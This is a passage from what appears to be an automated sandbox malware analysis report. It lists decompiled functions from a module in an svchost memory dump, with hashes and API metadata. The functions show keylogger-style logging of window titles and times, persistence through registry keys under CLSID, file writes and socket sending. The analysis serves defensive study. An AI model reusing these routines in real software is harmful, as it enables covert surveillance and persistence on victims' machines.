                                                            				E0000022B22BAF53D490(__ebx,  &_v2600, _t113 + 1, _t122, _t122, _t130);
                                                            				_t119 =  *0xaf599e30; // 0x0
                                                            				if ( *_t119 + __ebx - 0x400 <= 0) goto 0xaf53d7e6;
                                                            				_t40 = _t119 + 0x422; // 0x422
                                                            				r8d = 0x800;
                                                            				E0000022B22BAF563830( *_t119 + __ebx, 0, _t68, _t69, _t40, L"\r\n\r\n[Title:%s]\r\n[Time:]%d-%d-%d  %d:%d:%d\r\n[Content:]", _t114,  &_v2600);
                                                            				 *_t119 = 0;
                                                            				lstrcatW(??, ??);
                                                            				_t87 =  *0xaf599e30; // 0x0
                                                            				 *_t87 =  *_t87 + __ebx;
                                                            				return E0000022B22BAF55A7C0( *_t119 + __ebx, _t87, _v24 ^ _t124 - 0x00000a80);
                                                            			}








































                                                            0x22baf53d623
                                                            0x22baf53d629
                                                            0x22baf53d634
                                                            0x22baf53d63b
                                                            0x22baf53d63e
                                                            0x22baf53d646
                                                            0x22baf53d64a
                                                            0x22baf53d64d
                                                            0x22baf53d651
                                                            0x22baf53d668
                                                            0x22baf53d66d
                                                            0x22baf53d673
                                                            0x22baf53d67b
                                                            0x22baf53d681
                                                            0x22baf53d68f
                                                            0x22baf53d694
                                                            0x22baf53d69a
                                                            0x22baf53d6a1
                                                            0x22baf53d6a6
                                                            0x22baf53d6aa
                                                            0x22baf53d6ac
                                                            0x22baf53d6ac
                                                            0x22baf53d6c3
                                                            0x22baf53d6ca
                                                            0x22baf53d6d2
                                                            0x22baf53d6d6
                                                            0x22baf53d6e4
                                                            0x22baf53d6e7
                                                            0x22baf53d6ec
                                                            0x22baf53d6f0
                                                            0x22baf53d6f3
                                                            0x22baf53d6fe
                                                            0x22baf53d700
                                                            0x22baf53d710
                                                            0x22baf53d718
                                                            0x22baf53d71d
                                                            0x22baf53d72d
                                                            0x22baf53d733
                                                            0x22baf53d73d
                                                            0x22baf53d74d
                                                            0x22baf53d758
                                                            0x22baf53d75e
                                                            0x22baf53d764
                                                            0x22baf53d768
                                                            0x22baf53d774
                                                            0x22baf53d77f
                                                            0x22baf53d789
                                                            0x22baf53d78e
                                                            0x22baf53d79c
                                                            0x22baf53d7a1
                                                            0x22baf53d7af
                                                            0x22baf53d7b4
                                                            0x22baf53d7b9
                                                            0x22baf53d7ca
                                                            0x22baf53d7cc
                                                            0x22baf53d7d5
                                                            0x22baf53d7db
                                                            0x22baf53d7e0
                                                            0x22baf53d7f0
                                                            0x22baf53d7f6
                                                            0x22baf53d805
                                                            0x22baf53d82f

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Window$ForegroundLocalTextTimelstrcatwsprintf
                                                            • String ID: [Title:%s][Time:]%d-%d-%d %d:%d:%d[Content:]
                                                            • API String ID: 67575802-2837871436
                                                            • Opcode ID: 69e9fd58b96e4f3d4d3854af24b79439bf4c14fd42c8887bbbade52ff94f1acd
                                                            • Instruction ID: 7ff3c3c6744c53a91c14f4cf279d73229a01ff78d6a4f145791e3b8beb2b99dd
                                                            • Opcode Fuzzy Hash: 69e9fd58b96e4f3d4d3854af24b79439bf4c14fd42c8887bbbade52ff94f1acd
                                                            • Instruction Fuzzy Hash: E2518E33604B94A6EB758F95E0583EAB3B1F385B50F444211DA9A03B9ADF7EC415CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$CloseCreateHandlePointerSizeWrite
                                                            • String ID:
                                                            • API String ID: 1886887421-3916222277
                                                            • Opcode ID: d224db8499f9ce0f67bf050c4578c36161d58d33bc40e1a247dc001eab747ad5
                                                            • Instruction ID: 52d4ae5a1a928f0a0788c20e30e321076494ff5a6fcdfa21b642a6058b5ffc4a
                                                            • Opcode Fuzzy Hash: d224db8499f9ce0f67bf050c4578c36161d58d33bc40e1a247dc001eab747ad5
                                                            • Instruction Fuzzy Hash: B5414423710A84A6FF228F69E46C7AA7760F794B98F548324DE4A43B96DF3EC145C700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalSection$EnterLeaveSleepclosesockethtonssendtosocket
                                                            • String ID:
                                                            • API String ID: 920770778-0
                                                            • Opcode ID: 5350461786bff152b63b3b2c8cad6893e4e9ffaf9b45ddaf88dfe0b0133d58e1
                                                            • Instruction ID: 9cbee46d7a5e1670a11a71fb20c4ac8e686de340817591b1390bed821fe73b53
                                                            • Opcode Fuzzy Hash: 5350461786bff152b63b3b2c8cad6893e4e9ffaf9b45ddaf88dfe0b0133d58e1
                                                            • Instruction Fuzzy Hash: 8A41AB33210684A7EB31CF65E46839EB7B1F784B44F544105DA8A47BAADF3AD896CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Object$CreateDeleteSectionSelect
                                                            • String ID:
                                                            • API String ID: 3188413882-3916222277
                                                            • Opcode ID: 0f7374a2714653dd941a78a046297790ff33184f52ad4544f62458838381129a
                                                            • Instruction ID: c22b5e5beb4f46e9f1059accaa68350bdc60167859244cf4004c6bd362babc32
                                                            • Opcode Fuzzy Hash: 0f7374a2714653dd941a78a046297790ff33184f52ad4544f62458838381129a
                                                            • Instruction Fuzzy Hash: C1411B77614B84CBC750CF29E484699BBA0F789B98F158226EF4D83B29DF39C451CB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$CloseCreateHandlePointerWrite
                                                            • String ID: q$s
                                                            • API String ID: 3604237281-2459310677
                                                            • Opcode ID: ee29e8d2e400fc2b527e0687e6f7e94d409a35ec394128138fbd016ee424c08e
                                                            • Instruction ID: 9aed0f4a014f5c92db75acc98bce37b994a10e7081aeb6930d3c15cec5835f2c
                                                            • Opcode Fuzzy Hash: ee29e8d2e400fc2b527e0687e6f7e94d409a35ec394128138fbd016ee424c08e
                                                            • Instruction Fuzzy Hash: 8031F3736146809AEB20CB55E41C79EBBA0F389BE4F104215EE8807B99DF7EC489CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 67%
                                                            			E0000022B22BAF53FF10(void* __ecx, void* __edx, void* __eflags, char* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r9, long long _a8, long long _a16, long long _a24) {
                                                            				void* __rdi;
                                                            				void* __r14;
                                                            				void* __r15;
                                                            				int _t20;
                                                            				void* _t31;
                                                            				void* _t32;
                                                            				char* _t40;
                                                            				long long _t60;
                                                            				void* _t69;
                                                            				void* _t71;
                                                            				char* _t72;
                                                            				void* _t73;
                                                            
                                                            				_t69 = __r8;
                                                            				_t60 = __rsi;
                                                            				_t40 = __rax;
                                                            				_a16 = __rbx;
                                                            				_a24 = __rbp;
                                                            				_t73 = __rcx;
                                                            				E0000022B22BAF53F750(__rsi, __r9, _t71, __rcx);
                                                            				_t72 = _t40;
                                                            				E0000022B22BAF53FC50(__rbx, _t60, __r9, _t72, _t73);
                                                            				if (_t72 == 0) goto 0xaf53ff4b;
                                                            				LocalSize(??);
                                                            				if (_t40 == 0) goto 0xaf53ff5c;
                                                            				LocalSize(??);
                                                            				if (_t40 + _t40 == 0) goto 0xaf53ffe1;
                                                            				_a8 = _t60;
                                                            				LocalAlloc(??, ??);
                                                            				_t61 = _t40;
                                                            				 *_t40 = 0x8e;
                                                            				if (0 == 0) goto 0xaf53ff98;
                                                            				r8d = 0;
                                                            				_t6 = _t40 + 1; // 0x1
                                                            				E0000022B22BAF562BA0(0x40, 0, _t31, _t32, _t6, _t72, _t40, _t40, _t69);
                                                            				LocalFree(??);
                                                            				if (0 == 0) goto 0xaf53ffb8;
                                                            				r8d = 0;
                                                            				E0000022B22BAF562BA0(0, 0, _t31, _t32, _t72 + 1 + _t40, _t40, _t40, _t61, _t69);
                                                            				LocalFree(??);
                                                            				_t20 = LocalSize(??);
                                                            				r9b = 0x3f;
                                                            				r8d = _t20;
                                                            				E0000022B22BAF531FF0( *((intOrPtr*)(_t73 + 8)), _t61);
                                                            				return LocalFree(??);
                                                            			}















                                                            0x22baf53ff10
                                                            0x22baf53ff10
                                                            0x22baf53ff10
                                                            0x22baf53ff10
                                                            0x22baf53ff15
                                                            0x22baf53ff25
                                                            0x22baf53ff2a
                                                            0x22baf53ff2f
                                                            0x22baf53ff32
                                                            0x22baf53ff3d
                                                            0x22baf53ff42
                                                            0x22baf53ff4e
                                                            0x22baf53ff53
                                                            0x22baf53ff61
                                                            0x22baf53ff66
                                                            0x22baf53ff70
                                                            0x22baf53ff76
                                                            0x22baf53ff79
                                                            0x22baf53ff7e
                                                            0x22baf53ff80
                                                            0x22baf53ff83
                                                            0x22baf53ff8a
                                                            0x22baf53ff92
                                                            0x22baf53ff9a
                                                            0x22baf53ffa4
                                                            0x22baf53ffaa
                                                            0x22baf53ffb2
                                                            0x22baf53ffbb
                                                            0x22baf53ffc5
                                                            0x22baf53ffc8
                                                            0x22baf53ffce
                                                            0x22baf53fff4

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Local$FreeSize$AddressLibraryLoadProc$Alloc
                                                            • String ID:
                                                            • API String ID: 111737154-0
                                                            • Opcode ID: 4172108d635db459362c6864aa8768446e46ac8b2ddb719c3c2b30b8a576c1fc
                                                            • Instruction ID: a966246fa67ce896ead80958b936fdb6bb6d77cf8109fb3406ad4aff1ebffb36
                                                            • Opcode Fuzzy Hash: 4172108d635db459362c6864aa8768446e46ac8b2ddb719c3c2b30b8a576c1fc
                                                            • Instruction Fuzzy Hash: B7210B27305A5066EE26AFD7A42C3EAB390F789FC0F480524DE1A07757DF3AC0064780
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressCloseLibraryLoadOpenProc
                                                            • String ID: Advapi32.dll$RegRenameKey
                                                            • API String ID: 2178542278-2310806928
                                                            • Opcode ID: c47923858d9d37e0adf9b7ba642ea88ff25cc01d58de8711dbd89c8daadbd35d
                                                            • Instruction ID: d3c809649d6e8bdb8591e4accae0c304604d08163e3bbca6c25e0a43f219119b
                                                            • Opcode Fuzzy Hash: c47923858d9d37e0adf9b7ba642ea88ff25cc01d58de8711dbd89c8daadbd35d
                                                            • Instruction Fuzzy Hash: 3F119173715B50A6EE519F57F84C696B3A1F784FD0F084025EE8943B69DF39C0468B00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 46%
                                                            			E0000022B22BAF545F5F(void* __rax, long long __rbx, long long _a176) {
                                                            				int _t5;
                                                            				void* _t9;
                                                            				void* _t16;
                                                            				void* _t19;
                                                            				void* _t21;
                                                            				void* _t26;
                                                            				void* _t27;
                                                            				void* _t28;
                                                            
                                                            				_t9 = __rax;
                                                            				_pop(_t19);
                                                            				goto 0xaf546b40;
                                                            				_a176 = __rbx;
                                                            				E0000022B22BAF545FD0(_t16, _t19, _t21, _t26, _t27, _t28);
                                                            				if (_t9 == 0) goto 0xaf545fa9;
                                                            				_t5 = LocalSize(??);
                                                            				r9b = 0x3f;
                                                            				r8d = _t5;
                                                            				E0000022B22BAF531FF0( *((intOrPtr*)(_t19 + 8)), _t9);
                                                            				return LocalFree(??);
                                                            			}











                                                            0x22baf545f5f
                                                            0x22baf545f6d
                                                            0x22baf545f6e
                                                            0x22baf545f73
                                                            0x22baf545f78
                                                            0x22baf545f83
                                                            0x22baf545f88
                                                            0x22baf545f92
                                                            0x22baf545f95
                                                            0x22baf545f9b
                                                            0x22baf545fb3

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Service$CloseDatabaseHandleOpen$ChangeConfigLockManagerUnlock
                                                            • String ID:
                                                            • API String ID: 2762133943-0
                                                            • Opcode ID: 29167c6bc474538600a62a10073a99064300952de0cbeae73f2b8a0282cc91a0
                                                            • Instruction ID: 6475bd064a81df975ac39311e93c400f41d12fd11bd9b8dc9fae30b2c1c1467d
                                                            • Opcode Fuzzy Hash: 29167c6bc474538600a62a10073a99064300952de0cbeae73f2b8a0282cc91a0
                                                            • Instruction Fuzzy Hash: D7117232704B80D2EB258F66B81C25AB7E5FB88BC0F084524DE9A07B5ADF3DC0558B00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 46%
                                                            			E0000022B22BAF545F55(void* __rax, long long __rbx, long long _a232) {
                                                            				int _t5;
                                                            				void* _t9;
                                                            				void* _t16;
                                                            				void* _t20;
                                                            				void* _t22;
                                                            				void* _t28;
                                                            				void* _t29;
                                                            				void* _t30;
                                                            
                                                            				_t9 = __rax;
                                                            				_pop(_t20);
                                                            				goto 0xaf546b40;
                                                            				_a232 = __rbx;
                                                            				E0000022B22BAF545FD0(_t16, _t20, _t22, _t28, _t29, _t30);
                                                            				if (_t9 == 0) goto 0xaf545fa9;
                                                            				_t5 = LocalSize(??);
                                                            				r9b = 0x3f;
                                                            				r8d = _t5;
                                                            				E0000022B22BAF531FF0( *((intOrPtr*)(_t20 + 8)), _t9);
                                                            				return LocalFree(??);
                                                            			}











                                                            0x22baf545f55
                                                            0x22baf545f6d
                                                            0x22baf545f6e
                                                            0x22baf545f73
                                                            0x22baf545f78
                                                            0x22baf545f83
                                                            0x22baf545f88
                                                            0x22baf545f92
                                                            0x22baf545f95
                                                            0x22baf545f9b
                                                            0x22baf545fb3

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Service$CloseDatabaseHandleOpen$ChangeConfigLockManagerUnlock
                                                            • String ID:
                                                            • API String ID: 2762133943-0
                                                            • Opcode ID: 4358572366bedb1f0e23307840933bb83ae960f857adb464ce6cee077f71c3e1
                                                            • Instruction ID: 452d83a643f407a3fe11a0f9329b347bcc3117e7aa60c69878dfd2fef11b96af
                                                            • Opcode Fuzzy Hash: 4358572366bedb1f0e23307840933bb83ae960f857adb464ce6cee077f71c3e1
                                                            • Instruction Fuzzy Hash: AA114232714B80D2EF258F66B81C25AB7A5FB88BD0F184524DE9A07B59EF3DD0558B00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 39%
                                                            			E0000022B22BAF54A4A0(void* __eflags) {
                                                            				signed int _v24;
                                                            				void* _v552;
                                                            				char _v632;
                                                            				void* _v648;
                                                            				char _v656;
                                                            				char _v660;
                                                            				char _v664;
                                                            				long long _v672;
                                                            				long long _v680;
                                                            				void* __rbx;
                                                            				void* _t33;
                                                            				void* _t36;
                                                            				void* _t37;
                                                            				signed long long _t43;
                                                            				long long _t48;
                                                            				void* _t61;
                                                            				void* _t62;
                                                            				signed long long _t63;
                                                            
                                                            				_t43 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_v24 = _t43 ^ _t63;
                                                            				_v660 = 4;
                                                            				_v664 = 0;
                                                            				E0000022B22BAF549800(_t48, L"SEOID",  &_v632, _t62);
                                                            				wsprintfW(??, ??);
                                                            				r8d = _v660;
                                                            				E0000022B22BAF563830(_t33, 0, _t36, _t37,  &_v664, L"SOFTWARE\\Classes\\CLSID\\%s", _t61,  &_v632);
                                                            				_v656 = _t48;
                                                            				r9d = 0x20119;
                                                            				_v680 =  &_v656;
                                                            				r8d = 0;
                                                            				if (RegOpenKeyExW(??, ??, ??, ??, ??) != 0) goto 0xaf54a583;
                                                            				_v672 =  &_v660;
                                                            				r8d = 0;
                                                            				_v680 =  &_v664;
                                                            				RegQueryValueExW(??, ??, ??, ??, ??, ??);
                                                            				_t32 =  ==  ? 1 : 0;
                                                            				RegCloseKey(??);
                                                            				_t41 =  ==  ? 1 : 0;
                                                            				if (( ==  ? 1 : 0) == 0) goto 0xaf54a583;
                                                            				goto 0xaf54a585;
                                                            				return E0000022B22BAF55A7C0(1,  &_v664, _v24 ^ _t63);
                                                            			}





















                                                            0x22baf54a4a9
                                                            0x22baf54a4b3
                                                            0x22baf54a4bd
                                                            0x22baf54a4ca
                                                            0x22baf54a4d5
                                                            0x22baf54a4ee
                                                            0x22baf54a4f4
                                                            0x22baf54a500
                                                            0x22baf54a50a
                                                            0x22baf54a50f
                                                            0x22baf54a515
                                                            0x22baf54a51a
                                                            0x22baf54a534
                                                            0x22baf54a540
                                                            0x22baf54a54f
                                                            0x22baf54a559
                                                            0x22baf54a55e
                                                            0x22baf54a56b
                                                            0x22baf54a573
                                                            0x22baf54a579
                                                            0x22baf54a57b
                                                            0x22baf54a581
                                                            0x22baf54a59d

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue$wsprintf
                                                            • String ID: SEOID$SOFTWARE\Classes\CLSID\%s
                                                            • API String ID: 3615287298-3437544703
                                                            • Opcode ID: d00070f6c3d7fbc3c3d0d5a92490252bd96c0c821e637285401c2de691e80ab1
                                                            • Instruction ID: 37ced3c1a8d151399c257a643f91ad6c54c2281f567e12f85264a246ce503a85
                                                            • Opcode Fuzzy Hash: d00070f6c3d7fbc3c3d0d5a92490252bd96c0c821e637285401c2de691e80ab1
                                                            • Instruction Fuzzy Hash: 5E216073329B84A6EB61CF91F48D7DAB3A4F784744F801015A69E43A5ADF79C108CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 31%
                                                            			E0000022B22BAF54C2B0(intOrPtr __edx, void* __eflags, long long __rbx, long long __rcx, void* __rdx, long long __rsi, void* __r8, void* __r11, long long _a24, long long _a32) {
                                                            				void* _v8;
                                                            				signed int _v24;
                                                            				void* _v552;
                                                            				char _v632;
                                                            				char _v648;
                                                            				long long _v664;
                                                            				long long _v672;
                                                            				long long _v680;
                                                            				intOrPtr _v688;
                                                            				long long _v696;
                                                            				void* _t30;
                                                            				intOrPtr _t36;
                                                            				signed long long _t41;
                                                            				long long _t44;
                                                            				void* _t62;
                                                            				void* _t67;
                                                            
                                                            				_t44 = __rbx;
                                                            				_a24 = __rbx;
                                                            				_a32 = __rsi;
                                                            				_t41 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_v24 = _t41 ^ _t62 - 0x000002d0;
                                                            				_t36 = __edx;
                                                            				E0000022B22BAF548BF0(__edx, _t41 ^ _t62 - 0x000002d0, __rbx, __rcx, __rdx, __r8, _t67, __r11);
                                                            				E0000022B22BAF549800(_t44, L"Global",  &_v632, __rsi);
                                                            				wsprintfW(??, ??);
                                                            				_v664 = _t44;
                                                            				_v672 =  &_v648;
                                                            				r9d = 0;
                                                            				_v680 = _t44;
                                                            				r8d = 0;
                                                            				_v688 = 0xf013f;
                                                            				_v696 = 0;
                                                            				_v648 = _t44;
                                                            				if (RegCreateKeyExW(??, ??, ??, ??, ??, ??, ??, ??, ??) != 0) goto 0xaf54c386;
                                                            				_t16 = _t44 + 3; // 0x3
                                                            				r9d = _t16;
                                                            				_v688 = _t36;
                                                            				r8d = 0;
                                                            				_v696 = __rcx;
                                                            				RegSetValueExW(??, ??, ??, ??, ??, ??);
                                                            				_t33 =  ==  ? 1 : 0;
                                                            				RegCloseKey(??);
                                                            				_t30 =  ==  ? 1 : 0;
                                                            				return E0000022B22BAF55A7C0(1,  &_v648, _v24 ^ _t62 - 0x000002d0);
                                                            			}



















                                                            0x22baf54c2b0
                                                            0x22baf54c2b0
                                                            0x22baf54c2b5
                                                            0x22baf54c2c2
                                                            0x22baf54c2cc
                                                            0x22baf54c2d4
                                                            0x22baf54c2d9
                                                            0x22baf54c2ea
                                                            0x22baf54c303
                                                            0x22baf54c310
                                                            0x22baf54c31d
                                                            0x22baf54c322
                                                            0x22baf54c325
                                                            0x22baf54c32a
                                                            0x22baf54c32d
                                                            0x22baf54c33c
                                                            0x22baf54c340
                                                            0x22baf54c34d
                                                            0x22baf54c354
                                                            0x22baf54c354
                                                            0x22baf54c358
                                                            0x22baf54c363
                                                            0x22baf54c366
                                                            0x22baf54c36b
                                                            0x22baf54c378
                                                            0x22baf54c380
                                                            0x22baf54c386
                                                            0x22baf54c3ac

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseValue$CreateOpenQuerywsprintf
                                                            • String ID: Global$SOFTWARE\Classes\CLSID\%s
                                                            • API String ID: 73588525-1865207932
                                                            • Opcode ID: 7cd9f5dd0876402cf28caf478eede5fb911d9810b5707cfe57c303bab957c3a9
                                                            • Instruction ID: 32d79533764882247eabc50ccf6dd512650de73bab43782e696bcf274acfe424
                                                            • Opcode Fuzzy Hash: 7cd9f5dd0876402cf28caf478eede5fb911d9810b5707cfe57c303bab957c3a9
                                                            • Instruction Fuzzy Hash: BD216933214B84A2EB308FA5F88D78EB7A5F788794F804126AA8D43A19DF79C505CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 31%
                                                            			E0000022B22BAF53C200(long long __rbx, long long __rcx, long long _a16) {
                                                            				signed int _v24;
                                                            				void* _v552;
                                                            				char _v632;
                                                            				long long _v648;
                                                            				long long _v664;
                                                            				long long _v672;
                                                            				long long _v680;
                                                            				intOrPtr _v688;
                                                            				long long _v696;
                                                            				intOrPtr _t36;
                                                            				signed long long _t40;
                                                            				signed long long _t41;
                                                            				signed long long _t42;
                                                            				long long _t44;
                                                            				void* _t61;
                                                            				void* _t62;
                                                            				void* _t66;
                                                            				void* _t67;
                                                            
                                                            				_a16 = __rbx;
                                                            				_t40 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t41 = _t40 ^ _t62 - 0x000002d0;
                                                            				_v24 = _t41;
                                                            				E0000022B22BAF549800(__rcx, L"Global",  &_v632, _t61);
                                                            				wsprintfW(??, ??);
                                                            				_t42 = _t41 | 0xffffffff;
                                                            				if ( *((short*)(__rcx + 2 + _t42 * 2)) != 0) goto 0xaf53c251;
                                                            				_t36 = 2 + (_t42 + 1) * 2;
                                                            				E0000022B22BAF548BF0(_t36, _t42 + 1, __rcx, __rcx, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v632, _t66, _t67);
                                                            				_t44 =  &_v648;
                                                            				_v664 = __rcx;
                                                            				_v672 = _t44;
                                                            				r9d = 0;
                                                            				_v680 = __rcx;
                                                            				r8d = 0;
                                                            				_v648 = __rcx;
                                                            				_v688 = 0xf013f;
                                                            				_v696 = 0;
                                                            				if (RegCreateKeyExW(??, ??, ??, ??, ??, ??, ??, ??, ??) != 0) goto 0xaf53c2e1;
                                                            				_t21 = _t44 + 3; // 0x3
                                                            				r9d = _t21;
                                                            				_v688 = _t36;
                                                            				r8d = 0;
                                                            				_v696 = __rcx;
                                                            				RegSetValueExW(??, ??, ??, ??, ??, ??);
                                                            				RegCloseKey(??);
                                                            				return E0000022B22BAF55A7C0(0, _t44, _v24 ^ _t62 - 0x000002d0);
                                                            			}





















                                                            0x22baf53c200
                                                            0x22baf53c20d
                                                            0x22baf53c214
                                                            0x22baf53c217
                                                            0x22baf53c22e
                                                            0x22baf53c247
                                                            0x22baf53c24d
                                                            0x22baf53c25b
                                                            0x22baf53c25d
                                                            0x22baf53c269
                                                            0x22baf53c270
                                                            0x22baf53c275
                                                            0x22baf53c282
                                                            0x22baf53c287
                                                            0x22baf53c28a
                                                            0x22baf53c28f
                                                            0x22baf53c292
                                                            0x22baf53c297
                                                            0x22baf53c29f
                                                            0x22baf53c2b2
                                                            0x22baf53c2b9
                                                            0x22baf53c2b9
                                                            0x22baf53c2bd
                                                            0x22baf53c2c8
                                                            0x22baf53c2cb
                                                            0x22baf53c2d0
                                                            0x22baf53c2db
                                                            0x22baf53c301

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseValue$CreateOpenQuerywsprintf
                                                            • String ID: Global$SOFTWARE\Classes\CLSID\%s
                                                            • API String ID: 73588525-1865207932
                                                            • Opcode ID: 30ab3177694c33fdf4efd9e3b1b178a5a563e838a76560b53d07659d0998b58c
                                                            • Instruction ID: 71419ffa5f7b44bb0a634aebaa179f00818def66ae09601b19d5a4aa7d19ac33
                                                            • Opcode Fuzzy Hash: 30ab3177694c33fdf4efd9e3b1b178a5a563e838a76560b53d07659d0998b58c
                                                            • Instruction Fuzzy Hash: 63214133214B84A2EB319F94F49D3DEB7A1F784764F405216E6A943B9ADF79C109CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 27%
                                                            			E0000022B22BAF53C0F0(long long __rbx, long long __rcx, long long _a16) {
                                                            				signed int _v24;
                                                            				char _v552;
                                                            				char _v632;
                                                            				long long _v648;
                                                            				long long _v664;
                                                            				long long _v672;
                                                            				long long _v680;
                                                            				intOrPtr _v688;
                                                            				long long _v696;
                                                            				intOrPtr _t36;
                                                            				signed long long _t40;
                                                            				signed long long _t41;
                                                            				signed long long _t42;
                                                            				long long _t44;
                                                            				long long _t50;
                                                            				void* _t56;
                                                            				void* _t61;
                                                            				void* _t62;
                                                            				void* _t65;
                                                            				void* _t67;
                                                            				void* _t68;
                                                            
                                                            				_a16 = __rbx;
                                                            				_t40 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t41 = _t40 ^ _t62 - 0x000002d0;
                                                            				_v24 = _t41;
                                                            				_t42 = _t41 | 0xffffffff;
                                                            				asm("o16 nop [eax+eax]");
                                                            				if ( *((short*)(__rcx + 2 + _t42 * 2)) != 0) goto 0xaf53c120;
                                                            				_t36 = 2 + (_t42 + 1) * 2;
                                                            				E0000022B22BAF548BF0(_t36, _t42 + 1, __rcx, __rcx, _t56, _t65, _t67, _t68);
                                                            				E0000022B22BAF549800(__rcx, L"Global",  &_v632, _t61);
                                                            				_t50 =  &_v552;
                                                            				wsprintfW(??, ??);
                                                            				_t44 =  &_v648;
                                                            				_v664 = _t50;
                                                            				_v672 = _t44;
                                                            				r9d = 0;
                                                            				_v680 = _t50;
                                                            				r8d = 0;
                                                            				_v648 = _t50;
                                                            				_v688 = 0xf013f;
                                                            				_v696 = 0;
                                                            				if (RegCreateKeyExW(??, ??, ??, ??, ??, ??, ??, ??, ??) != 0) goto 0xaf53c1d8;
                                                            				_t21 = _t44 + 3; // 0x3
                                                            				r9d = _t21;
                                                            				_v688 = _t36;
                                                            				r8d = 0;
                                                            				_v696 = __rcx;
